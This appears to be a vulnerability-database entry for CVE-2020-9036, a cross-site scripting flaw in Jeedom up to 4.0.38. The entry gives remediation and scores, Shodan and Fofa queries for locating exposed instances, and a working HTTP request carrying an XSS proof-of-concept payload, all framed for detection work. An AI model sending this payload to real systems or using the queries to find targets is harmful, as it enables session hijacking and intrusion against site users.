🔙 목록으로 돌아가기

CVE-2020-9036: Jeedom <=4.0.38 - Cross-Site Scripting

TitleJeedom <=4.0.38 - Cross-Site Scripting
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.2618
CVE IDCVE-2020-9036
CWE IDCWE-79
Shodan Queryhttp.title:"jeedom"
Fofa Querytitle="jeedom"
Tags cve cve2020 xss jeedom vuln

🔍 Vulnerability Description

Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

🌐 HTTP Request

GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_6; de) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-9036.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-9036.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A